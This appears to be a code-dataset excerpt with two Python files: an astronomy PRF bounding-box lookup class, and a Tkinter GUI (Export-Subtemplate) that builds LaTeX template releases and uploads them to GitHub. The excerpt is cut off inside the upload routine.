| 37.076923 | 299 | 0.664938 | 114 | 964 | 5.342105 | 0.552632 | 0.073892 | 0.064039 | 0.08867 | 0.35468 | 0.223317 | 0.223317 | 0 | 0 | 0 | 0 | 0.041995 | 0.209544 | 964 | 25 | 300 | 38.56 | 0.757218 | 0.070539 | 0 | 0.333333 | 1 | 0 | 0.343785 | 0.134379 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fd627c34fe6856c059f4f50328f1da178a89cc8 | 3,527 | py | Python | diffimg/AbstractPrfLookup.py | exoplanetvetting/DAVE | aea19a30d987b214fb4c0cf01aa733f127c411b9 | [
"MIT"
] | 7 | 2019-05-07T02:01:51.000Z | 2022-03-16T08:09:39.000Z | diffimg/AbstractPrfLookup.py | barentsen/dave | 45ba97b7b535ad26dd555c33c963c6224a9af23c | [
"MIT"
] | 18 | 2015-12-09T22:18:59.000Z | 2017-04-26T13:11:44.000Z | diffimg/AbstractPrfLookup.py | barentsen/dave | 45ba97b7b535ad26dd555c33c963c6224a9af23c | [
"MIT"
] | 5 | 2017-03-08T11:42:53.000Z | 2020-05-07T00:10:37.000Z | """
Created on Sun Dec 2 14:12:41 2018
@author: fergal
"""
from __future__ import print_function
from __future__ import division
import numpy as np
class AbstractPrfLookup(object):
    """Store and lookup a previously computed PRF function.

    This abstract class is created in the hope that much of the functionality
    can be reused for TESS.

    To get the recorded prf, use getPrfForBbox(), although this function
    doesn't work in the base class. See docs in that method for more details.

    Other functions are in the works to map that PRF onto a given mask.

    Todo
    --------
    This class is ripe for optimization with numba.
    """

    def __init__(self, path):
        self.path = path        # directory containing the PRF data
        self.cache = dict()     # memoises previously loaded PRF data
        self.gridSize = None    # to be set by daughter classes

    def abstractGetPrfForBbox(self, col, row, bboxIn, getPrfFunc, *args):
        """Get the prf for an image described by a bounding box.

        This function requires as input a function to look up the PRF for a
        given col row (getPrfFunc). This function is not implemented in the
        base class, as it will be specific to each mission. The design intent
        is that you override getPrfForBbox() in the daughter class where you
        define the lookup function, then calls the parent class method.
        See KeplerPrf() for an example.

        Input:
        -----------
        col, row
            (floats) Centroid for which to generate prf
        bboxIn
            (int array). Size of image to return. bbox is a 4 elt array of
            [col0, col1, row0, row1]
        getPrfFunc
            (function) Function that returns a PRF object. This function must
            have the signature ``(np 2d array = getPrfFunc(col, row, *args)``

        Optional Inputs
        -----------------
        Any optional inputs get passed to getPrfFunc

        Returns:
        ----------
        A 2d numpy array of the computed prf at the given position.

        Raises:
        ----------
        ValueError if the central pixel of (col, row) lies outside bboxIn.

        Notes:
        ------------
        If bbox is larger than the prf postage stamp returned, the missing
        values will be filled with zeros. If the bbox is smaller than the
        postage stamp, only the requested pixels will be returned.
        """
        bbox = np.array(bboxIn).astype(int)
        nColOut = bbox[1] - bbox[0]
        nRowOut = bbox[3] - bbox[2]
        imgOut = np.zeros((nRowOut, nColOut))

        # Location of origin of bbox relative to col,row.
        # This is usually zero, but need not be.
        # Bugfix: ``np.int`` was removed in NumPy 1.24; plain ``int``
        # behaves identically here.
        colOffsetOut = (bbox[0] - np.floor(col)).astype(int)
        rowOffsetOut = (bbox[2] - np.floor(row)).astype(int)

        interpPrf = getPrfFunc(col, row, *args)
        nRowPrf, nColPrf = interpPrf.shape
        colOffsetPrf = -np.floor(nColPrf / 2.).astype(int)
        rowOffsetPrf = -np.floor(nRowPrf / 2.).astype(int)

        # Overlap of the PRF stamp and the requested bbox, column direction.
        di = colOffsetPrf - colOffsetOut
        i0 = max(0, -di)
        i1 = min(nColOut - di, nColPrf)
        if i1 <= i0:
            raise ValueError("Central pixel column not in bounding box")
        i = np.arange(i0, i1)
        assert (np.min(i) >= 0)

        # Overlap of the PRF stamp and the requested bbox, row direction.
        dj = rowOffsetPrf - rowOffsetOut
        j0 = max(0, -dj)
        j1 = min(nRowOut - dj, nRowPrf)
        if j1 <= j0:
            raise ValueError("Central pixel row not in bounding box")
        j = np.arange(j0, j1)
        assert (np.min(j) >= 0)

        # @TODO: figure out how to do this in one step
        for r in j:
            imgOut[r + dj, i + di] = interpPrf[r, i]

        return imgOut
| 30.938596 | 89 | 0.600227 | 477 | 3,527 | 4.410901 | 0.429769 | 0.01711 | 0.020913 | 0.013308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017241 | 0.309328 | 3,527 | 113 | 90 | 31.212389 | 0.84647 | 0.49277 | 0 | 0 | 0 | 0 | 0.052203 | 0 | 0 | 0 | 0 | 0.017699 | 0.055556 | 1 | 0.055556 | false | 0 | 0.083333 | 0 | 0.194444 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8fd7c61de1a9fa96c0542025479683d5e477222b | 39,478 | py | Python | main.py | Template-Latex/Export-Subtemplate | 595bf76f5c94daffdba4fbb686d51cce7ad298c8 | [
"MIT"
] | 1 | 2017-08-02T02:54:53.000Z | 2017-08-02T02:54:53.000Z | main.py | Template-Latex/Export-Subtemplate | 595bf76f5c94daffdba4fbb686d51cce7ad298c8 | [
"MIT"
] | null | null | null | main.py | Template-Latex/Export-Subtemplate | 595bf76f5c94daffdba4fbb686d51cce7ad298c8 | [
"MIT"
] | null | null | null | """
EXPORT-SUBTEMPLATE
Genera distintos sub-releases y exporta los templates
Autor: Pablo Pizarro R. @ ppizarror.com
Licencia:
The MIT License (MIT)
Copyright 2017-2021 Pablo Pizarro R.
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ['CreateVersion']
# Importación de librerías
from extlbx import __author__, __version__
from extlbx.releases import REL_PROFESSIONALCV, REL_INFORME, REL_CONTROLES, REL_AUXILIAR, \
RELEASES, REL_REPORTE, REL_TESIS, REL_ARTICULO, REL_PRESENTACION, REL_POSTER
from extlbx.convert import *
from extlbx.version import *
from extlbx.sound import Sound
from extlbx.resources import *
from extlbx.utils import *
import tkinter as tk
from tkinter import font
from tkinter import messagebox
from extlbx.vframe import VerticalScrolledFrame
from pyperclip import copy as extlbcbpaste
from functools import partial
import json
import logging
import os
import signal
import traceback
# Pillow is optional: icons are only attached to buttons when it is present.
try:
    # noinspection PyUnresolvedReferences
    from PIL import ImageTk
    PIL_EXIST = True
except ImportError:
    PIL_EXIST = False
# Constants
# GitHub commit-message templates (Spanish strings are user-visible output
# and are kept verbatim).
GITHUB_PDF_COMMIT = 'Se agrega pdf v{0} de {1}'
GITHUB_PRINT_MSG = 'SUBIENDO v{0} DE {1} ... '
GITHUB_REP_COMMIT = 'Version {0}'
GITHUB_STAT_COMMIT = 'Estadisticas compilacion v{0} de {1}'
GITHUB_UPDATE_COMMIT = 'Update upload.json'

# Keyboard-shortcut help shown in the in-app console (F1). Extra entries are
# appended at runtime from the configuration file.
HELP = {
    'ESC': 'Cierra la aplicación',
    'F1': 'Muestra esta ayuda',
    'F2': 'Muestra las configuraciones',
    'F3': 'Muestra el acerca de',
    'F4': 'Limpia la ventana',
    'ENTER': 'Inicia la rutina'
}

# Maximum number of lines kept in the in-app console buffer.
LIMIT_MESSAGES_CONSOLE = 1000

# Application log file and the message templates written to it (keyed by the
# codes passed to CreateVersion._log).
LOG_FILE = 'log.txt'
LOG_MSG = {
    'CHANGED': 'Cambiando subrelease a {0} v{1}',
    'CONFIG': 'Estableciendo parametro <{0}> en <{1}>',
    'COPY': 'Copiando version {0} de {1} al portapapeles',
    'CREATE_V': 'Creando version {0} de {1}',
    'CREATE_V_COMPLETE': 'Proceso finalizado',
    'END': 'Programa cerrado',
    'OPEN': 'Inicio Export-Subtemplate v{0}',
    'OTHER': '{0}',
    'PRINTCONFIG': 'Mostrando configuraciones',
    'SHOWABOUT': 'Mostrando acerca de',
    'SHOWHELP': 'Mostrando la ayuda',
    'SUBV+': 'Creando subversion mayor de {0} a {1}',
    'SUBV-': 'Creando subversion menor de {0} a {1}',
    'UPLOAD_COMPLETE': 'Carga completa',
    'UPLOAD_V': 'Subiendo version {0} de {1} a GitHub',
}

# Window-title variants for the different application states.
TITLE = 'Export-Subtemplate'
TITLE_LOADING = '{0} | Espere ...'
TITLE_UPLOADING = '{0} | Cargando a GitHub ...'
# noinspection PyCompatibility,PyBroadException,PyCallByClass,PyUnusedLocal,PyShadowingBuiltins
class CreateVersion(object):
"""
Pide la versión al usuario y genera releases.
"""
    def __init__(self):
        """Build the Tk window, load configuration, and wire up all widgets,
        key bindings, and the closures that implement the UI behaviour."""

        def _checkver(*args):
            """
            Auxiliary function that checks the entered version string is valid.

            :param sv: StringVar holding the version
            :return:
            """
            ver = self._versionstr.get()
            try:
                v, dev, h = mk_version(ver)
                if not validate_ver(dev, self._lastloadedv):
                    raise Exception('Version invalida')
                self._startbutton.configure(state='normal', cursor='hand2')
                self._versiontxt.bind('<Return>', self._start)
                self._validversion = True
            except Exception as exc:
                print(exc)
                self._startbutton.configure(state='disabled', cursor='arrow')
                # NOTE(review): bind() with no handler only queries the
                # current binding; presumably unbind() was intended — confirm.
                self._versiontxt.bind('<Return>')
                self._validversion = False

        def _create_ver_d(*args):
            """
            Pre-fill the version field with a decremented (minor) subversion.

            :param args: Optional arguments
            :return:
            """
            for j in RELEASES.keys():
                if self._release.get() == RELEASES[j]['NAME']:
                    v = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE']).split(' ')[0]
                    self._versionstr.set(v_down(v))
                    self._startbutton.focus_force()
                    self._log('SUBV-', text=[RELEASES[j]['NAME'], v])
                    return

        def _create_ver_u(*args):
            """
            Pre-fill the version field with an incremented (major) subversion.

            :param args: Optional arguments
            :return:
            """
            for j in RELEASES.keys():
                if self._release.get() == RELEASES[j]['NAME']:
                    v = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE']).split(' ')[0]
                    self._versionstr.set(v_up(v))
                    self._startbutton.focus_force()
                    self._log('SUBV+', text=[RELEASES[j]['NAME'], v])
                    return

        def _copyver(*args):
            """
            Copy the selected template's version to the clipboard.

            :param args: Optional arguments
            :return:
            """
            for j in RELEASES.keys():
                if self._release.get() == RELEASES[j]['NAME']:
                    v = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE']).split(' ')[0]
                    extlbcbpaste(self._getconfig('CLIPBOARD_FORMAT').format(v))
                    if self._getconfig('INFOCONSOLE'):
                        self._print('INFO: VERSION COPIADA')
                    self._log('COPY', text=[v, RELEASES[j]['NAME']])
                    return
            # No template selected: report and clear the clipboard.
            if self._getconfig('INFOCONSOLE'):
                self._print('ERROR: TEMPLATE NO ESCOGIDO')
            extlbcbpaste('')

        def _clear(*args):
            """
            Reset the window: console, template selector and version field.

            :param args: Optional arguments
            :return:
            """
            self._clearconsole(-1)
            self._release.set('Seleccione template')
            self._versiontxt.delete(0, 'end')
            self._root.focus()

        def _kill(*args):
            """
            Destroy the window and terminate the process.

            :return:
            """

            # NOTE(review): _oskill is defined but never called below —
            # presumably a leftover hard-kill fallback; confirm before removal.
            def _oskill():
                if is_windows():
                    os.system('taskkill /PID {0} /F'.format(str(os.getpid())))
                else:
                    os.kill(os.getpid(), signal.SIGKILL)

            self._log('END')
            self._root.destroy()
            exit()

        def _printconfig(*args):
            """
            Print the current configuration values to the console.

            :param args: Optional arguments
            :return: None
            """
            self._clearconsole()
            self._print('CONFIGURACIONES')
            maxlen = 0
            # NOTE(review): dict.keys() has no .sort() on Python 3 — this
            # looks like a Python 2 leftover (cf. list(...) used elsewhere
            # in this file); verify on the target interpreter.
            key = self._configs.keys()
            key.sort(key=natural_keys)
            # First pass: compute padding width over event-enabled configs.
            for j in key:
                if self._configs[j]['EVENT']:
                    maxlen = max(maxlen, len(j))
            # Second pass: print each config aligned to that width.
            for j in key:
                if self._configs[j]['EVENT']:
                    self._print('\t{0} [{1}]'.format(j.ljust(maxlen), self._getconfig(j)))
            for j in range(5):
                self._print('\n')
            self._log('PRINTCONFIG')

        def _scroll_console(event):
            """
            Catch the mouse-wheel event and scroll the console accordingly.

            :param event: Event
            :return: None
            """
            # Only react when the pointer is over the console area.
            if -175 < event.x < 240 and 38 < event.y < 136:
                # Wheel delta units differ per platform.
                if is_windows():
                    if -1 * (event.delta / 100) < 0:
                        move = -1
                    else:
                        move = 2
                elif is_osx():
                    if -1 * event.delta < 0:
                        move = -2
                    else:
                        move = 2
                else:
                    if -1 * (event.delta / 100) < 0:
                        move = -1
                    else:
                        move = 2
                # Don't scroll up when the console is nearly empty.
                if len(self._console) < 5 and move < 0:
                    return
                self._info_slider.canv.yview_scroll(move, 'units')

        def _set_config(paramname, paramvalue, *args):
            """
            Store a configuration value ('!' toggles a boolean).

            :param paramname: Parameter name
            :param paramvalue: Parameter value
            :return:
            """
            if paramvalue == '!':
                self._configs[paramname]['VALUE'] = not self._configs[paramname]['VALUE']
            else:
                self._configs[paramname]['VALUE'] = paramvalue
            vl = [paramname, self._configs[paramname]['VALUE']]
            self._print('SE ESTABLECIO <{0}> EN {1}'.format(*vl))
            self._log('CONFIG', text=vl, mode='CFG')

        def _set_templatever(template_name, *args):
            """
            Select the given template in the dropdown.

            :param template_name: Template ID
            :return:
            """
            self._release.set(template_name)

        def _show_about(*args):
            """
            Print the about box (version, author, license) to the console.

            :param args: Optional arguments
            :return: None
            """
            self._clearconsole(-1)
            self._print('ACERCA DE')
            self._print('\tExport Template v{0}'.format(__version__))
            self._print('\tAutor: {0}\n'.format(__author__))
            # NOTE: 'license' shadows the builtin of the same name.
            license = file_to_list(EXTLBX_LICENSE)
            for line in license:
                self._print(line.strip(), scrolldir=-1)
            self._log('SHOWABOUT')

        def _show_help(*args):
            """
            Print the keyboard-shortcut help to the console.

            :param args: Optional arguments
            :return: None
            """
            self._clearconsole(-1)
            self._print('AYUDA')
            keys = list(HELP.keys())
            keys.sort()
            for k in keys:
                self._print('\t{0}: {1}'.format(k, HELP[k]), scrolldir=-1)
            self._log('SHOWHELP')

        def _update_ver(*args):
            """
            Focus the version field and load the selected release's versions.

            :param args: Optional arguments
            :return:
            """
            self._versiontxt.focus()
            # Detach the trace while resetting the field so _checkver does
            # not fire on the programmatic clear, then re-attach it.
            self._versionstr.trace_vdelete('w', self._versiontrace)
            self._versionstr.set('')
            self._versiontrace = self._versionstr.trace('w', self._checkver)
            self._clearconsole()
            for j in RELEASES.keys():
                if self._release.get() == RELEASES[j]['NAME']:
                    v = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE'])
                    self._versiontxt.configure(state='normal')
                    self._print('SELECCIONADO: {0}'.format(RELEASES[j]['NAME']))
                    self._print('ÚLTIMA VERSIÓN: {0}'.format(v))
                    # Enable the upload button only when the last compiled
                    # version differs from the last uploaded one.
                    if self._uploaded[j] != v.split(' ')[0]:
                        self._uploadstatebtn('on')
                    else:
                        self._uploadstatebtn('off')
                    self._lastloadedv = v.split(' ')[0]
                    self._log('CHANGED', text=[RELEASES[j]['NAME'], v])
                    return

        self._root = tk.Tk()
        self._root.protocol('WM_DELETE_WINDOW', _kill)
        self._root.tk.call('tk', 'scaling', 1.35)
        self._sounds = Sound()

        # Load configuration from the json file
        with open(EXTLBX_CONFIGS) as json_data:
            d = json.load(json_data)
        self._configs = d
        self._lascpdf = True
        self._lastsav = True

        # Root directory of the current file
        self._configs["MAIN_ROOT"]["VALUE"] = str(os.path.abspath(os.path.dirname(__file__))).replace('\\', '/') + '/'

        # Set window size and centre it on screen
        size = [self._configs['WINDOW_SIZE']['WIDTH'], self._configs['WINDOW_SIZE']['HEIGHT']]
        self._root.minsize(width=size[0], height=size[1])
        self._root.geometry('%dx%d+%d+%d' % (size[0], size[1], (self._root.winfo_screenwidth() - size[0]) / 2,
                                             (self._root.winfo_screenheight() - size[1]) / 2))
        self._root.resizable(width=False, height=False)
        self._root.focus_force()

        # Window style (title and platform-specific icon)
        self._root.title(TITLE)
        if is_osx():
            self._root.iconbitmap(EXTLBX_ICON_MAC)
            img = tk.Image('photo', file=EXTLBX_ICON_MAC)
            # noinspection PyProtectedMember
            self._root.tk.call('wm', 'iconphoto', self._root._w, img)
        else:
            self._root.iconbitmap(EXTLBX_ICON)

        fonts = [font.Font(family='Courier', size=13 if is_osx() else 8),
                 font.Font(family='Verdana', size=6),
                 font.Font(family='Times', size=10),
                 font.Font(family='Times', size=10, weight=font.BOLD),
                 font.Font(family='Verdana', size=6, weight=font.BOLD),
                 font.Font(family='Verdana', size=10),
                 font.Font(family='Verdana', size=7)]
        f1 = tk.Frame(self._root, border=5)
        f1.pack(fill=tk.X)
        f2 = tk.Frame(self._root)
        f2.pack(fill=tk.BOTH)

        # Template selection dropdown; Ctrl-1..N selects the Nth template
        rels = []
        p = 1
        ky = list(RELEASES.keys())
        ky.sort()
        for b in ky:
            rels.append(RELEASES[b]['NAME'])
            self._root.bind('<Control-Key-{0}>'.format(p), partial(_set_templatever, RELEASES[b]['NAME']))
            p += 1
        self._release = tk.StringVar(self._root)
        self._release.set('Seleccione template')
        w = tk.OptionMenu(f1, self._release, *tuple(rels))
        w['width'] = 17 if is_osx() else 24
        w['relief'] = tk.GROOVE
        w['anchor'] = tk.W
        w['cursor'] = 'hand2'
        w.pack(side=tk.LEFT)
        self._release.trace('w', _update_ver)

        # Version text field (validated on every keystroke via the trace)
        tk.Label(f1, text='Nueva versión:').pack(side=tk.LEFT, padx=5)
        self._checkver = _checkver
        self._versionstr = tk.StringVar(self._root)
        self._versiontrace = self._versionstr.trace('w', self._checkver)
        self._versiontxt = tk.Entry(f1, relief=tk.GROOVE, width=5 if is_osx() else 10,
                                    font=fonts[5], textvariable=self._versionstr)
        self._versiontxt.configure(state='disabled')
        self._versiontxt.pack(side=tk.LEFT, padx=5, pady=2)
        self._versiontxt.focus()
        self._validversion = False
        self._lastloadedv = ''

        # Start button (enabled only when the entered version is valid)
        self._startbutton = tk.Button(f1, text='Iniciar', state='disabled', relief=tk.GROOVE, command=self._start)
        self._startbutton.pack(side=tk.LEFT, padx=3, anchor=tk.W)

        # Upload button; icons only when Pillow is available
        if PIL_EXIST:
            self._upload_imgs = [
                ImageTk.PhotoImage(file=EXTLBX_BTN_UPLOAD),
                ImageTk.PhotoImage(file=EXTLBX_BTN_UPLOAD_DISABLED)
            ]
            self._uploadbutton = tk.Button(f1, image=self._upload_imgs[0], relief=tk.GROOVE, height=20, width=20,
                                           command=self._upload_github, border=0)
        else:
            self._uploadbutton = tk.Button(f1, relief=tk.GROOVE, height=20, width=20,
                                           command=self._upload_github, border=0)
            self._upload_imgs = None
        self._uploadbutton.pack(side=tk.RIGHT, padx=2, anchor=tk.E)
        self._uploadstatebtn('off')
        self._checkuploaded()

        # In-window console (scrollable black label)
        self._info_slider = VerticalScrolledFrame(f2)
        self._info_slider.canv.config(bg='#000000')
        self._info_slider.pack(pady=2, anchor=tk.NE, fill=tk.BOTH, padx=1)
        self._info = tk.Label(self._info_slider.interior, text='', justify=tk.LEFT, anchor=tk.NW, bg='black',
                              fg='white',
                              wraplength=self._configs['WINDOW_SIZE']['WIDTH'],
                              font=fonts[0], relief=tk.FLAT, border=2,
                              cursor='arrow')
        self._info.pack(anchor=tk.NW, fill=tk.BOTH)
        self._info_slider.scroller.pack_forget()
        self._console = []
        self._cnextnl = False

        # Keyboard/mouse event bindings
        self._root.bind('<Control-q>', _kill)
        self._root.bind('<Control-z>', _copyver)
        self._root.bind('<Down>', _create_ver_d)
        self._root.bind('<Escape>', _kill)
        self._root.bind('<F1>', _show_help)
        self._root.bind('<F2>', _printconfig)
        self._root.bind('<F3>', _show_about)
        self._root.bind('<F4>', _clear)
        self._root.bind('<MouseWheel>', _scroll_console)
        self._root.bind('<Return>', self._start)
        self._root.bind('<Up>', _create_ver_u)
        # Config-driven toggle shortcuts, also appended to the HELP table
        for i in self._configs.keys():
            if self._configs[i]['EVENT']:
                self._root.bind(self._configs[i]['KEY'], partial(_set_config, i, '!'))
                HELP[self._configs[i]['KEY'].replace('<', '').replace('>', '')] = 'Activa/Desactiva {0}'.format(i)

        # Write the startup entry to the log
        self._log('OPEN', text=__version__)
def _checkuploaded(self):
"""
Chequea los archivos cargados a github.
:return:
"""
with open(EXTLBX_UPLOAD) as json_data:
self._uploaded = json.load(json_data)
for j in RELEASES.keys():
if j not in self._uploaded:
self._uploaded[j] = '0.0.0'
def _clearconsole(self, scrolldir=1):
"""
Limpia la consola.
:param scrolldir: Dirección del scroll
:return:
"""
# noinspection PyShadowingNames
def _slide(*args):
"""
Mueve el scroll.
:return: None
"""
self._info_slider.canv.yview_scroll(1000 * scrolldir, 'units')
self._console = []
self._info.config(text='')
self._root.after(10, _slide)
def _getconfig(self, paramname):
"""
Obtiene el valor de la configuración.
:param paramname: Nombre del parámetro de la configuración
:return:
"""
return self._configs[paramname]['VALUE']
def _print(self, msg, hour=False, end=None, scrolldir=1):
"""
Imprime mensaje en consola.
:param msg: Mensaje
:param hour: Muestra la hora
:param scrolldir: Dirección del scroll
:return: None
"""
def _consoled(c):
"""
Función que genera un string con una lista.
:param c: Lista
:return: Texto
"""
text = ''
for i in c:
text = text + i + '\n'
return text
def _get_hour():
"""
Función que retorna la hora de sistema.
:return: String
"""
return time.ctime(time.time())[11:20]
def _slide(*args):
"""
Mueve el scroll.
:return: None
"""
self._info_slider.canv.yview_scroll(2000 * scrolldir, 'units')
try:
msg = str(msg)
if hour:
msg = _get_hour() + ' ' + msg
if len(self._console) == 0 or self._console[len(self._console) - 1] != msg:
if self._cnextnl:
self._console[len(self._console) - 1] += msg
else:
self._console.append(msg)
if end == '':
self._cnextnl = True
else:
self._cnextnl = False
if len(self._console) > LIMIT_MESSAGES_CONSOLE:
self._console.pop()
self._info.config(text=_consoled(self._console))
self._root.after(50, _slide)
except:
self._clearconsole()
    def execute(self):
        """Start the Tk main loop (blocks until the window is closed).

        :return:
        """
        self._root.mainloop()
@staticmethod
def _log(msg, mode='INFO', text=''):
"""
Crea una entrada en el log.
:type text: str, list
:return:
"""
try:
d = time.strftime('%d/%m/%Y %H:%M:%S')
with open(LOG_FILE, 'a') as logfile:
if isinstance(text, list):
logfile.write('{1} [{0}] {2}\n'.format(d, mode, LOG_MSG[msg].format(*text)))
else:
logfile.write('{1} [{0}] {2}\n'.format(d, mode, LOG_MSG[msg].format(text)))
except:
dt = open(LOG_FILE, 'w')
dt.close()
def _saveupload(self):
"""
Guarda los uploads en el json.
:return:
"""
with open(EXTLBX_UPLOAD, 'w') as outfile:
json.dump(self._uploaded, outfile)
def _start(self, *args):
    """
    Genera la versión ingresada.

    :param args: Argumentos opcionales del evento
    :return: None
    """

    def _scroll():
        # Desplaza la consola hacia abajo
        self._info_slider.canv.yview_scroll(1000, 'units')

    def _run_export(t, ver, versiondev, versionhash):
        """
        Ejecuta el exportador asociado al ID *t*.

        Si el exportador falla se registra la excepción y se limpian los
        archivos de los releases involucrados; un ID desconocido lanza
        una excepción (capturada por el caller).
        """
        informeroot = self._getconfig('INFORME_ROOT')
        savepdf = self._getconfig('SAVE_PDF')
        # ID -> (función de exportación, etiqueta de error,
        #        kwargs específicos, releases a limpiar en caso de error)
        exporters = {
            1: (export_informe, 'informe',
                {'doclean': True, 'backtoroot': True, 'informeroot': informeroot},
                [REL_INFORME]),
            2: (export_auxiliares, 'auxiliares',
                {'savepdf': savepdf, 'informeroot': informeroot},
                [REL_INFORME, REL_AUXILIAR]),
            3: (export_controles, 'controles',
                {'savepdf': savepdf, 'informeroot': informeroot},
                [REL_INFORME, REL_AUXILIAR, REL_CONTROLES]),
            4: (export_cv, 'cv',
                {'savepdf': savepdf, 'backtoroot': True},
                [REL_PROFESSIONALCV]),
            5: (export_reporte, 'reporte',
                {'savepdf': savepdf, 'informeroot': informeroot},
                [REL_INFORME, REL_REPORTE]),
            6: (export_tesis, 'tesis',
                {'savepdf': savepdf, 'informeroot': informeroot},
                [REL_INFORME, REL_TESIS]),
            7: (export_presentacion, 'presentacion',
                {'savepdf': savepdf, 'informeroot': informeroot},
                [REL_INFORME, REL_PRESENTACION]),
            8: (export_articulo, 'articulo',
                {'savepdf': savepdf, 'informeroot': informeroot},
                [REL_INFORME, REL_REPORTE, REL_ARTICULO]),
            9: (export_poster, 'poster',
                {'savepdf': savepdf, 'informeroot': informeroot},
                [REL_INFORME, REL_PRESENTACION, REL_POSTER]),
        }
        if t not in exporters:
            raise Exception('ERROR: ID INCORRECTO')
        fun, label, extra, onerror = exporters[t]
        kwargs = {
            'printfun': self._print,
            'dosave': self._getconfig('SAVE'),
            'docompile': self._getconfig('COMPILE'),
            'addstat': self._getconfig('SAVE_STAT'),
            'plotstats': self._getconfig('PLOT_STAT'),
            'mainroot': self._getconfig('MAIN_ROOT'),
            'statsroot': self._getconfig('STATS_ROOT'),
        }
        kwargs.update(extra)
        try:
            fun(ver, versiondev, versionhash, **kwargs)
        except Exception:
            logging.exception('Error al generar {0}'.format(label))
            for rel in onerror:
                clear_dict(RELEASES[rel], 'FILES')

    def _callback():
        t = 0
        lastv = ''
        msg = ''
        relnm = ''
        # Busca el release seleccionado en la interfaz
        for j in RELEASES.keys():
            if self._release.get() == RELEASES[j]['NAME']:
                t = RELEASES[j]['ID']
                lastv = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE']).split(' ')[0]
                msg = RELEASES[j]['MESSAGE']
                relnm = RELEASES[j]['NAME']
                break

        # Se crea la versión
        ver, versiondev, versionhash = mk_version(self._versionstr.get())

        # Se comprueba versiones
        if not validate_ver(versiondev, lastv):
            messagebox.showerror('Error', 'La versión nueva debe ser superior a la actual ({0}).'.format(lastv))
            self._print('ERROR: VERSIÓN INCORRECTA')
        else:
            try:
                self._print(msg.format(versiondev))
                self._log('CREATE_V', text=[versiondev, relnm])
                _run_export(t, ver, versiondev, versionhash)
                self._lastsav = self._getconfig('SAVE')
                self._lascpdf = self._getconfig('COMPILE') and self._getconfig('SAVE_PDF')
                self._print(' ')
                if self._lastsav:
                    self._uploadstatebtn('on')
            except Exception as e:
                messagebox.showerror('Error fatal', 'Ocurrio un error inesperado al procesar la solicitud.')
                self._log('OTHER', text=str(e), mode='ERROR')
                self._print('ERROR: EXCEPCIÓN INESPERADA')
                self._print(str(e))
                self._print(traceback.format_exc())
                self._sounds.alert()

        # Restaura el estado de la ventana y del campo de versión
        self._root.configure(cursor='arrow')
        self._root.title(TITLE)
        self._versionstr.trace_vdelete('w', self._versiontrace)
        self._versionstr.set('')
        self._versiontrace = self._versionstr.trace('w', self._checkver)
        self._root.update()
        self._root.after(50, _scroll)
        self._log('CREATE_V_COMPLETE')
        return

    if not self._validversion:
        return
    self._root.title(TITLE_LOADING.format(TITLE))
    self._root.configure(cursor='wait')
    self._root.update()
    # El trabajo pesado se difiere para que la UI alcance a refrescarse
    self._root.after(500, _callback)
    self._startbutton.configure(state='disabled')
    self._uploadstatebtn('off')
    return
def _uploadstatebtn(self, state):
    """
    Cambia el estado del botón upload.

    :param state: Estado ('on' habilita, cualquier otro valor deshabilita)
    :return: None
    """
    enabled = state == 'on'
    self._uploadbutton.configure(state='normal' if enabled else 'disabled')
    self._uploadbutton.configure(cursor='hand2' if enabled else 'arrow')
    if self._upload_imgs:
        # Índice 0: imagen habilitada, índice 1: deshabilitada
        img = self._upload_imgs[0 if enabled else 1]
        self._uploadbutton.configure(image=img)
        # Mantiene una referencia para que Tk no pierda la imagen
        self._uploadbutton.image = img
    self._uploadbutton.update()
def _upload_github(self, *args):
    """
    Sube la versión a github.

    :param args: Argumentos opcionales
    :return: None
    """

    def _scroll():
        # Desplaza la consola hacia abajo
        self._info_slider.canv.yview_scroll(1000, 'units')

    def _callback():
        lastv = ''
        jver = ''
        lastvup = ''
        # Busca el release seleccionado y su última versión
        for j in RELEASES.keys():
            if self._release.get() == RELEASES[j]['NAME']:
                lastv = get_last_ver(self._getconfig('STATS_ROOT') + RELEASES[j]['STATS']['FILE']).split(' ')[0]
                lastvup = lastv.split('-')[0]
                jver = j
                self._log('UPLOAD_V', text=[lastvup, RELEASES[j]['NAME']])
                break

        # Sube el contenido a la plataforma
        try:
            # Se cambia el path
            os.chdir(self._getconfig('MAIN_ROOT'))
            cmsg = GITHUB_REP_COMMIT.format(lastv)

            # Se llama a consola para añadir carpeta a git
            t = time.time()
            with open(os.devnull, 'w') as FNULL:
                with Cd(RELEASES[jver]['GIT']):
